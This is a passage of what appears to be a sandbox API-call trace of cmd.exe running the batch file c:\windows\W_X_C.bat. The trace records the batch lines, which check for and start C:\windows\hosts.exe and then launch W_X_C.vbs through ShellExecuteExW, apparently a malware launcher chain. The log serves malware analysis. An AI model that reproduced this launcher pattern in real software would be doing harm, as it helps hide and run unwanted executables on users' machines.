lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.810] ReadFile (in: hFile=0x80, lpBuffer=0x4a3c6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x33f310, lpOverlapped=0x0 | out: lpBuffer=0x4a3c6640*, lpNumberOfBytesRead=0x33f310*=0x150, lpOverlapped=0x0) returned 1 [0166.864] SetFilePointer (in: hFile=0x80, lDistanceToMove=11, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0166.864] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="@echo off\r\n", cbMultiByte=11, lpWideCharStr=0x4a3cc640, cchWideChar=8191 | out: lpWideCharStr="@echo off\r\n") returned 11 [0166.865] _get_osfhandle (_FileHandle=3) returned 0x80 [0166.865] GetFileType (hFile=0x80) returned 0x1 [0166.865] _get_osfhandle (_FileHandle=3) returned 0x80 [0166.865] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0166.865] GetProcessHeap () returned 0x700000 [0166.865] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x400a) returned 0x716ad0 [0166.865] GetProcessHeap () returned 0x700000 [0166.865] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x716ad0 | out: hHeap=0x700000) returned 1 [0166.866] GetProcessHeap () returned 0x700000 [0166.866] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x58) returned 0x714f68 [0166.867] _wcsicmp (_String1="echo", _String2=")") returned 60 [0166.867] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0166.867] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0166.867] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0166.867] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0166.867] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0166.867] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0166.867] GetProcessHeap () returned 0x700000 [0166.867] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x58) returned 0x714fc8 [0166.867] GetProcessHeap () returned 0x700000 [0166.867] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x12) returned 0x701350 [0166.868] GetProcessHeap () returned 0x700000 [0166.868] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x12) returned 0x715028 [0166.871] _tell (_FileHandle=3) returned 11 [0166.871] _close (_FileHandle=3) returned 0 [0166.872] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0166.872] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0166.872] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0166.872] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0166.872] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0166.872] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0166.872] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0166.872] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0166.872] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0166.872] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0166.872] GetConsoleTitleW (in: lpConsoleTitle=0x33eef4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0166.873] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0166.873] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0166.881] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0166.881] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0166.881] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0166.881] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0166.881] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0166.881] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0166.881] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0166.881] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0166.881] GetProcessHeap () returned 0x700000 [0166.881] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x1c) returned 0x7147a8 [0166.882] GetProcessHeap () returned 0x700000 [0166.882] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x7147a8, Size=0x12) returned 0x715048 [0166.882] GetProcessHeap () returned 0x700000 [0166.882] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x715048) returned 0x12 [0166.882] GetProcessHeap () returned 0x700000 [0166.882] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x1c) returned 0x7147a8 [0166.883] _wcsnicmp (_String1="off", _String2="off", _MaxCount=0x3) returned 0 [0166.883] _get_osfhandle (_FileHandle=1) returned 0x7 [0166.883] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0166.883] _get_osfhandle (_FileHandle=1) returned 0x7 [0166.884] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a3c41ac | out: lpMode=0x4a3c41ac) returned 1 [0166.884] _get_osfhandle (_FileHandle=0) returned 0x3 [0166.884] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a3c41b0 | out: lpMode=0x4a3c41b0) returned 1 [0166.884] SetConsoleInputExeNameW () returned 0x1 [0166.885] GetConsoleOutputCP () returned 0x1b5 [0166.885] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a3c4260 | out: lpCPInfo=0x4a3c4260) returned 1 [0166.885] SetThreadUILanguage (LangId=0x0) returned 0x409 [0166.885] CreateFileW (lpFileName="c:\\windows\\W_X_C.bat" (normalized: "c:\\windows\\w_x_c.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x33f32c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x80 [0166.886] _open_osfhandle (_OSFileHandle=0x80, _Flags=8) returned 3 [0166.886] _get_osfhandle (_FileHandle=3) returned 0x80 [0166.886] SetFilePointer (in: hFile=0x80, lDistanceToMove=11, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0166.886] GetProcessHeap () returned 0x700000 [0166.886] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x7147a8 | out: hHeap=0x700000) returned 1 [0166.886] GetProcessHeap () returned 0x700000 [0166.886] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x715048 | out: hHeap=0x700000) returned 1 [0166.886] GetProcessHeap () returned 0x700000 [0166.886] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x715028 | out: hHeap=0x700000) returned 1 [0166.886] GetProcessHeap () returned 0x700000 [0166.886] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x701350 | out: hHeap=0x700000) returned 1 [0166.886] GetProcessHeap () returned 0x700000 [0166.886] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x714fc8 | out: hHeap=0x700000) returned 1 [0166.886] GetProcessHeap () returned 0x700000 [0166.886] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x714f68 | out: hHeap=0x700000) returned 1 [0166.887] _get_osfhandle (_FileHandle=3) returned 0x80 [0166.887] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0166.887] ReadFile (in: hFile=0x80, lpBuffer=0x4a3c6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x33f310, lpOverlapped=0x0 | out: lpBuffer=0x4a3c6640*, lpNumberOfBytesRead=0x33f310*=0x145, lpOverlapped=0x0) returned 1 [0166.887] SetFilePointer (in: hFile=0x80, lDistanceToMove=58, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3a [0166.887] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if not exist C:\\windows\\hosts.exe goto NOFILE\r\n", cbMultiByte=47, lpWideCharStr=0x4a3cc640, cchWideChar=8191 | out: lpWideCharStr="if not exist C:\\windows\\hosts.exe goto NOFILE\r\n") returned 47 [0166.896] _get_osfhandle (_FileHandle=3) returned 0x80 [0166.896] GetFileType (hFile=0x80) returned 0x1 [0166.896] _get_osfhandle (_FileHandle=3) returned 0x80 [0166.896] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3a [0166.897] GetProcessHeap () returned 0x700000 [0166.897] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x400a) returned 0x716ad0 [0166.897] GetProcessHeap () returned 0x700000 [0166.897] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x716ad0 | out: hHeap=0x700000) returned 1 [0166.897] _wcsicmp (_String1="if", _String2=")") returned 64 [0166.897] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0166.897] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0166.898] _wcsicmp (_String1="IF", _String2="if") returned 0 [0166.898] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0166.898] GetProcessHeap () returned 0x700000 [0166.898] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x58) returned 0x714f68 [0166.898] GetProcessHeap () returned 0x700000 [0166.898] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0xe) returned 0x7123f0 [0166.900] GetProcessHeap () returned 0x700000 [0166.900] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x18) returned 0x7151a8 [0166.903] _tell (_FileHandle=3) returned 58 [0166.903] _close (_FileHandle=3) returned 0 [0166.903] FindFirstFileExW (in: lpFileName="C:\\windows\\hosts.exe" (normalized: "c:\\windows\\hosts.exe"), fInfoLevelId=0x1, lpFindFileData=0x33ec9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33ec9c) returned 0x7151c8 [0166.903] GetProcessHeap () returned 0x700000 [0166.903] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x7119e0, Size=0x4) returned 0x7119e0 [0166.904] FindClose (in: hFindFile=0x7151c8 | out: hFindFile=0x7151c8) returned 1 [0166.904] _get_osfhandle (_FileHandle=1) returned 0x7 [0166.904] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0166.908] _get_osfhandle (_FileHandle=1) returned 0x7 [0166.908] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a3c41ac | out: lpMode=0x4a3c41ac) returned 1 [0166.908] _get_osfhandle (_FileHandle=0) returned 0x3 [0166.909] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a3c41b0 | out: lpMode=0x4a3c41b0) returned 1 [0166.909] SetConsoleInputExeNameW () returned 0x1 [0166.909] GetConsoleOutputCP () returned 0x1b5 [0166.909] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a3c4260 | out: lpCPInfo=0x4a3c4260) returned 1 [0166.909] SetThreadUILanguage (LangId=0x0) returned 0x409 [0166.910] CreateFileW (lpFileName="c:\\windows\\W_X_C.bat" (normalized: "c:\\windows\\w_x_c.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x33f32c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x80 [0166.910] _open_osfhandle (_OSFileHandle=0x80, _Flags=8) returned 3 [0166.910] _get_osfhandle (_FileHandle=3) returned 0x80 [0166.910] SetFilePointer (in: hFile=0x80, lDistanceToMove=58, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3a [0166.910] GetProcessHeap () returned 0x700000 [0166.910] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x7151a8 | out: hHeap=0x700000) returned 1 [0166.910] GetProcessHeap () returned 0x700000 [0166.910] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x715188 | out: hHeap=0x700000) returned 1 [0166.910] GetProcessHeap () returned 0x700000 [0166.910] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x715128 | out: hHeap=0x700000) returned 1 [0166.910] GetProcessHeap () returned 0x700000 [0166.911] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x7150e8 | out: hHeap=0x700000) returned 1 [0166.911] GetProcessHeap () returned 0x700000 [0166.911] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x7150a8 | out: hHeap=0x700000) returned 1 [0166.911] GetProcessHeap () returned 0x700000 [0166.911] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x715088 | out: hHeap=0x700000) returned 1 [0166.911] GetProcessHeap () returned 0x700000 [0166.911] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x715028 | out: hHeap=0x700000) returned 1 [0166.911] GetProcessHeap () returned 0x700000 [0166.911] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x712408 | out: hHeap=0x700000) returned 1 [0166.911] GetProcessHeap () returned 0x700000 [0166.911] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x714fc8 | out: hHeap=0x700000) returned 1 [0166.911] GetProcessHeap () returned 0x700000 [0166.911] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x701350 | out: hHeap=0x700000) returned 1 [0166.911] GetProcessHeap () returned 0x700000 [0166.911] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x7123f0 | out: hHeap=0x700000) returned 1 [0166.911] GetProcessHeap () returned 0x700000 [0166.911] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x714f68 | out: hHeap=0x700000) returned 1 [0166.912] _get_osfhandle (_FileHandle=3) returned 0x80 [0166.912] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3a [0166.912] ReadFile (in: hFile=0x80, lpBuffer=0x4a3c6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x33f310, lpOverlapped=0x0 | out: lpBuffer=0x4a3c6640*, lpNumberOfBytesRead=0x33f310*=0x116, lpOverlapped=0x0) returned 1 [0166.912] SetFilePointer (in: hFile=0x80, lDistanceToMove=87, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x57 [0166.912] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="@start C:\\windows\\hosts.exe\r\n", cbMultiByte=29, lpWideCharStr=0x4a3cc640, cchWideChar=8191 | out: lpWideCharStr="@start C:\\windows\\hosts.exe\r\n.exe goto NOFILE\r\n") returned 29 [0166.912] _get_osfhandle (_FileHandle=3) returned 0x80 [0166.913] GetFileType (hFile=0x80) returned 0x1 [0166.913] _get_osfhandle (_FileHandle=3) returned 0x80 [0166.913] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x57 [0166.913] GetProcessHeap () returned 0x700000 [0166.913] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x400a) returned 0x716ad0 [0166.913] GetProcessHeap () returned 0x700000 [0166.913] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x716ad0 | out: hHeap=0x700000) returned 1 [0166.915] GetProcessHeap () returned 0x700000 [0166.915] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x34) returned 0x715028 [0166.917] _tell (_FileHandle=3) returned 87 [0166.917] _close (_FileHandle=3) returned 0 [0166.917] _wcsicmp (_String1="start", _String2="DIR") returned 15 [0166.917] _wcsicmp (_String1="start", _String2="ERASE") returned 14 [0166.918] _wcsicmp (_String1="start", _String2="DEL") returned 15 [0166.918] _wcsicmp (_String1="start", _String2="TYPE") returned -1 [0166.918] _wcsicmp (_String1="start", _String2="COPY") returned 16 [0166.918] _wcsicmp (_String1="start", _String2="CD") returned 16 [0166.918] _wcsicmp (_String1="start", _String2="CHDIR") returned 16 [0166.918] _wcsicmp (_String1="start", _String2="RENAME") returned 1 [0166.918] _wcsicmp (_String1="start", _String2="REN") returned 1 [0166.918] _wcsicmp (_String1="start", _String2="ECHO") returned 14 [0166.918] _wcsicmp (_String1="start", _String2="SET") returned 15 [0166.918] _wcsicmp (_String1="start", _String2="PAUSE") returned 3 [0166.918] _wcsicmp (_String1="start", _String2="DATE") returned 15 [0166.918] _wcsicmp (_String1="start", _String2="TIME") returned -1 [0166.918] _wcsicmp (_String1="start", _String2="PROMPT") returned 3 [0166.918] _wcsicmp (_String1="start", _String2="MD") returned 6 [0166.918] _wcsicmp (_String1="start", _String2="MKDIR") returned 6 [0166.918] _wcsicmp (_String1="start", _String2="RD") returned 1 [0166.919] _wcsicmp (_String1="start", _String2="RMDIR") returned 1 [0166.919] _wcsicmp (_String1="start", _String2="PATH") returned 3 [0166.919] _wcsicmp (_String1="start", _String2="GOTO") returned 12 [0166.919] _wcsicmp (_String1="start", _String2="SHIFT") returned 12 [0166.919] _wcsicmp (_String1="start", _String2="CLS") returned 16 [0166.919] _wcsicmp (_String1="start", _String2="CALL") returned 16 [0166.919] _wcsicmp (_String1="start", _String2="VERIFY") returned -3 [0166.919] _wcsicmp (_String1="start", _String2="VER") returned -3 [0166.919] _wcsicmp (_String1="start", _String2="VOL") returned -3 [0166.919] _wcsicmp (_String1="start", _String2="EXIT") returned 14 [0166.919] _wcsicmp (_String1="start", _String2="SETLOCAL") returned 15 [0166.919] _wcsicmp (_String1="start", _String2="ENDLOCAL") returned 14 [0166.919] _wcsicmp (_String1="start", _String2="TITLE") returned -1 [0166.919] _wcsicmp (_String1="start", _String2="START") returned 0 [0166.919] GetConsoleTitleW (in: lpConsoleTitle=0x33eef4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0166.987] NeedCurrentDirectoryForExePathW (ExeName="C:\\windows\\.") returned 1 [0166.987] GetProcessHeap () returned 0x700000 [0166.987] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x24) returned 0x7150f0 [0166.987] GetProcessHeap () returned 0x700000 [0166.987] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x3c) returned 0x7126f8 [0167.005] _get_osfhandle (_FileHandle=1) returned 0x7 [0167.005] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0167.006] _get_osfhandle (_FileHandle=1) returned 0x7 [0167.006] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a3c41ac | out: lpMode=0x4a3c41ac) returned 1 [0167.008] _get_osfhandle (_FileHandle=0) returned 0x3 [0167.008] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a3c41b0 | out: lpMode=0x4a3c41b0) returned 1 [0167.009] SetConsoleInputExeNameW () returned 0x1 [0167.009] GetConsoleOutputCP () returned 0x1b5 [0167.009] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a3c4260 | out: lpCPInfo=0x4a3c4260) returned 1 [0167.009] SetThreadUILanguage (LangId=0x0) returned 0x409 [0167.010] CreateFileW (lpFileName="c:\\windows\\W_X_C.bat" (normalized: "c:\\windows\\w_x_c.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x33f32c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c [0167.010] _open_osfhandle (_OSFileHandle=0x7c, _Flags=8) returned 3 [0167.010] _get_osfhandle (_FileHandle=3) returned 0x7c [0167.010] SetFilePointer (in: hFile=0x7c, lDistanceToMove=87, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x57 [0167.010] GetProcessHeap () returned 0x700000 [0167.010] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x715150 | out: hHeap=0x700000) returned 1 [0167.010] GetProcessHeap () returned 0x700000 [0167.010] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x715120 | out: hHeap=0x700000) returned 1 [0167.010] GetProcessHeap () returned 0x700000 [0167.010] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x7150f0 | out: hHeap=0x700000) returned 1 [0167.010] GetProcessHeap () returned 0x700000 [0167.011] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x7126a0 | out: hHeap=0x700000) returned 1 [0167.011] GetProcessHeap () returned 0x700000 [0167.011] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x7150a8 | out: hHeap=0x700000) returned 1 [0167.011] GetProcessHeap () returned 0x700000 [0167.011] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x715068 | out: hHeap=0x700000) returned 1 [0167.011] GetProcessHeap () returned 0x700000 [0167.011] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x715028 | out: hHeap=0x700000) returned 1 [0167.011] GetProcessHeap () returned 0x700000 [0167.011] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x701350 | out: hHeap=0x700000) returned 1 [0167.011] GetProcessHeap () returned 0x700000 [0167.011] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x714fc8 | out: hHeap=0x700000) returned 1 [0167.011] GetProcessHeap () returned 0x700000 [0167.011] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x714f68 | out: hHeap=0x700000) returned 1 [0167.012] _get_osfhandle (_FileHandle=3) returned 0x7c [0167.012] SetFilePointer (in: hFile=0x7c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x57 [0167.012] ReadFile (in: hFile=0x7c, lpBuffer=0x4a3c6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x33f310, lpOverlapped=0x0 | out: lpBuffer=0x4a3c6640*, lpNumberOfBytesRead=0x33f310*=0xf9, lpOverlapped=0x0) returned 1 [0167.012] SetFilePointer (in: hFile=0x7c, lDistanceToMove=105, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x69 [0167.012] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="@start W_X_C.vbs\r\n", cbMultiByte=18, lpWideCharStr=0x4a3cc640, cchWideChar=8191 | out: lpWideCharStr="@start W_X_C.vbs\r\nhosts.exe\r\n.exe goto NOFILE\r\n") returned 18 [0167.012] _get_osfhandle (_FileHandle=3) returned 0x7c [0167.012] GetFileType (hFile=0x7c) returned 0x1 [0167.012] _get_osfhandle (_FileHandle=3) returned 0x7c [0167.013] SetFilePointer (in: hFile=0x7c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x69 [0167.013] GetProcessHeap () returned 0x700000 [0167.013] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x400a) returned 0x718dd8 [0167.013] GetProcessHeap () returned 0x700000 [0167.013] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x718dd8 | out: hHeap=0x700000) returned 1 [0167.016] GetProcessHeap () returned 0x700000 [0167.016] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x1e) returned 0x7147d0 [0167.020] _tell (_FileHandle=3) returned 105 [0167.020] _close (_FileHandle=3) returned 0 [0167.021] _wcsicmp (_String1="start", _String2="DIR") returned 15 [0167.021] _wcsicmp (_String1="start", _String2="ERASE") returned 14 [0167.021] _wcsicmp (_String1="start", _String2="DEL") returned 15 [0167.021] _wcsicmp (_String1="start", _String2="TYPE") returned -1 [0167.021] _wcsicmp (_String1="start", _String2="COPY") returned 16 [0167.021] _wcsicmp (_String1="start", _String2="CD") returned 16 [0167.021] _wcsicmp (_String1="start", _String2="CHDIR") returned 16 [0167.021] _wcsicmp (_String1="start", _String2="RENAME") returned 1 [0167.021] _wcsicmp (_String1="start", _String2="REN") returned 1 [0167.021] _wcsicmp (_String1="start", _String2="ECHO") returned 14 [0167.021] _wcsicmp (_String1="start", _String2="SET") returned 15 [0167.021] _wcsicmp (_String1="start", _String2="PAUSE") returned 3 [0167.021] _wcsicmp (_String1="start", _String2="DATE") returned 15 [0167.022] _wcsicmp (_String1="start", _String2="TIME") returned -1 [0167.022] _wcsicmp (_String1="start", _String2="PROMPT") returned 3 [0167.022] _wcsicmp (_String1="start", _String2="MD") returned 6 [0167.022] _wcsicmp (_String1="start", _String2="MKDIR") returned 6 [0167.022] _wcsicmp (_String1="start", _String2="RD") returned 1 [0167.022] _wcsicmp (_String1="start", _String2="RMDIR") returned 1 [0167.022] _wcsicmp (_String1="start", _String2="PATH") returned 3 [0167.022] _wcsicmp (_String1="start", _String2="GOTO") returned 12 [0167.022] _wcsicmp (_String1="start", _String2="SHIFT") returned 12 [0167.022] _wcsicmp (_String1="start", _String2="CLS") returned 16 [0167.022] _wcsicmp (_String1="start", _String2="CALL") returned 16 [0167.022] _wcsicmp (_String1="start", _String2="VERIFY") returned -3 [0167.022] _wcsicmp (_String1="start", _String2="VER") returned -3 [0167.022] _wcsicmp (_String1="start", _String2="VOL") returned -3 [0167.022] _wcsicmp (_String1="start", _String2="EXIT") returned 14 [0167.022] _wcsicmp (_String1="start", _String2="SETLOCAL") returned 15 [0167.023] _wcsicmp (_String1="start", _String2="ENDLOCAL") returned 14 [0167.023] _wcsicmp (_String1="start", _String2="TITLE") returned -1 [0167.023] _wcsicmp (_String1="start", _String2="START") returned 0 [0167.023] GetConsoleTitleW (in: lpConsoleTitle=0x33eef4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0167.023] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0167.023] GetProcessHeap () returned 0x700000 [0167.023] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x1d4) returned 0x7137d8 [0167.023] GetProcessHeap () returned 0x700000 [0167.023] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x3a0) returned 0x714f68 [0167.219] LoadLibraryExA (lpLibFileName="SHELL32.dll", hFile=0x0, dwFlags=0x0) returned 0x75cc0000 [0167.230] GetProcAddress (hModule=0x75cc0000, lpProcName="ShellExecuteExW") returned 0x75ce1e46 [0167.230] ShellExecuteExW (in: pExecInfo=0x322984*(cbSize=0x3c, fMask=0x140, hwnd=0x203dc, lpVerb=0x0, lpFile="C:\\Windows\\W_X_C.vbs", lpParameters="", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x322984*(cbSize=0x3c, fMask=0x140, hwnd=0x203dc, lpVerb=0x0, lpFile="C:\\Windows\\W_X_C.vbs", lpParameters="", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x200)) returned 1 [0172.277] CloseHandle (hObject=0x200) returned 1 [0172.277] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.277] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0172.278] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.278] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a3c41ac | out: lpMode=0x4a3c41ac) returned 1 [0172.279] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.279] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a3c41b0 | out: lpMode=0x4a3c41b0) returned 1 [0172.279] SetConsoleInputExeNameW () returned 0x1 [0172.279] GetConsoleOutputCP () returned 0x1b5 [0172.280] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a3c4260 | out: lpCPInfo=0x4a3c4260) returned 1 [0172.280] SetThreadUILanguage (LangId=0x0) returned 0x409 [0172.280] CreateFileW (lpFileName="c:\\windows\\W_X_C.bat" (normalized: "c:\\windows\\w_x_c.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x33f32c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0172.281] _open_osfhandle (_OSFileHandle=0x200, _Flags=8) returned 3 [0172.281] _get_osfhandle (_FileHandle=3) returned 0x200 [0172.281] SetFilePointer (in: hFile=0x200, lDistanceToMove=105, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x69 [0172.281] GetProcessHeap () returned 0x700000 [0172.281] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x715148 | out: hHeap=0x700000) returned 1 [0172.281] GetProcessHeap () returned 0x700000 [0172.281] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x714f68 | out: hHeap=0x700000) returned 1 [0172.281] GetProcessHeap () returned 0x700000 [0172.281] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x7137d8 | out: hHeap=0x700000) 